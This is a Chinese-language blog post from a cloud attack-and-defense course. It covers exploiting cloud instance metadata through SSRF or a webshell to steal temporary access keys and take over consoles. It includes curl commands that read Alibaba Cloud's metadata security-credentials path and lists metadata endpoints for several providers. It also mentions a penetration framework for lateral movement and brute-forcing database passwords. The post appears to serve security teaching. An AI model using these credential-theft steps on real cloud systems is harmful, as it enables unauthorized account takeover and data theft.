【第94课】云服务篇&弹性计算&云数据库&实例元数据&控制角色&AK控制台接管

Lucker_YYY

已于 2024-09-02 09:33:30 修改

阅读量34

点赞数 1

分类专栏：云上攻防文章标签：数据库

于 2024-09-02 09:30:13 首次发布

本文链接：https://blog.csdn.net/Lucker_YYY/article/details/141808410

版权

云上攻防专栏收录该内容

2 篇文章 0 订阅

订阅专栏

免责声明

本文发布的工具和脚本，仅用作测试和学习研究，禁止用于商业用途，不能保证其合法性，准确性，完整性和有效性，请根据情况自行判断。

如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利，则应及时通知并提供身份证明，所有权证明，我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用，任何人不得将其应用于非法用途及盈利等目的，间接使用文章中的任何工具、思路及技术，我方对于由此引起的法律后果概不负责。

知识点:
1、云服务-弹性计算服务器-元数据&SSRF&AK
2、云服务-云数据库-外部连接&权限提升

章节点：

云场景攻防：公有云，私有云，混合云，虚拟化集群，云桌面等
云厂商攻防：阿里云，腾讯云，华为云，亚马云，谷歌云，微软云等
云服务攻防：对象存储，云数据库，弹性计算服务器(云服务器)，VPC&RAM等
云原生攻防：Docker，Kubernetes(k8s)，容器逃逸，CI/CD等

一、演示案例-云服务-弹性计算服务器-元数据&SSRF&AK

元数据解释

实例元数据（metadata）包含了弹性计算云服务器实例在阿里云系统中的信息，您可以在运行中的实例内方便地查看实例元数据，并基于实例元数据配置或管理实例。（基本信息：实例ID、IP地址、网卡MAC地址、操作系统类型等信息。实例标识包括实例标识文档和实例标识签名，所有信息均实时生成，常用于快速辨别实例身份。）
在这里插入图片描述
各大云元数据地址：

阿里云元数据地址：http://100.100.100.200/
腾讯云元数据地址：http://metadata.tencentyun.com/
华为云元数据地址：http://169.254.169.254/
亚马云元数据地址：http://169.254.169.254/
微软云元数据地址：http://169.254.169.254/
谷歌云元数据地址：http://metadata.google.internal/

细节方面可通过访问官网找元数据访问触发说明
阿里云例子：通过元数据服务从ECS实例内部获取实例属性等信息_云服务器 ECS(ECS)-阿里云帮助中心
在这里插入图片描述
腾讯云例子：云服务器查看实例元数据-操作指南-文档中心-腾讯云

在这里插入图片描述

1、前提条件：

弹性计算服务器配置访问控制角色

在这里插入图片描述

SSRF漏洞或已取得某云服务器权限（webshell或漏洞rce可以访问触发url）

2、利用环境1：获取某服务器权限后横向移动

在这里插入图片描述

获取关键角色信息

curl http://100.100.100.200/latest/meta-data/

curl http://100.100.100.200/latest/meta-data/ram/security-credentials/

在这里插入图片描述

获取ecs角色临时凭证

curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs

在这里插入图片描述

利用AK横向移动

CF 云渗透框架项目：https://wiki.teamssix.com/CF/
在这里插入图片描述

在这里插入图片描述

1、先配置云服务商的访问密钥

cf config

在这里插入图片描述

2、获取控制台

在这里插入图片描述

3、获取所有的ecs服务器

在这里插入图片描述

4、执行命令(需要先获取ecs服务器)

在这里插入图片描述

5、获取所有oss存储桶

在这里插入图片描述

能看这么多东西是授权的权限高，如果权限低的话能看的东西就很少。

3、利用环境2：某服务器上Web资产存在SSRF漏洞

在这里插入图片描述

获取关键角色信息

curl http://100.100.100.200/latest/meta-data/
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/

获取ecs临时凭证

curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs

在这里插入图片描述

利用AK横向移动

CF 云渗透框架项目：https://wiki.teamssix.com/CF/

二、演示案例-云服务-云数据库-外部连接&权限提升

在这里插入图片描述

1、帐号密码

源码配置中找到（几率高）或爆破手段（几率低）

2、连接获取

白名单&外网直接Navicat支持连接
内网需要其中内网某一个服务器做转发

3、AK利用（权限提升）

CF 云渗透框架项目：https://wiki.teamssix.com/CF/

三、演示案例-云上攻防-如何利用SSRF直接打穿云上内网

1. 利用SSRF发现打点阿里云

这里的 SSRF 漏洞触发点在 UEditor 编辑器的上传图片功能中，下面我们尝试让服务器从 https://baidu.com?.jpg 获取图片。
在这里插入图片描述

2. 直接利用SSRF漏洞获取目标阿里云的元数据地址

在这里插入图片描述

3.直接上CF利用框架项目，冲起来

在这里插入图片描述

4.存储桶下载后里面翻出另一个AK信息，发现这个 AK 还具有 ECS 的权限。

在这里插入图片描述

5.直接使用 CF拿下一键接管控制台

在这里插入图片描述

Lucker_YYY

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
【第94课】云服务篇&弹性计算&云数据库&实例元数据&控制角色&AK控制台接管

知识点:1、云服务-器-元数据&SSRF&AK2、云服务-云数据库-外部连接&权限提升。
复制链接

扫一扫

专栏目录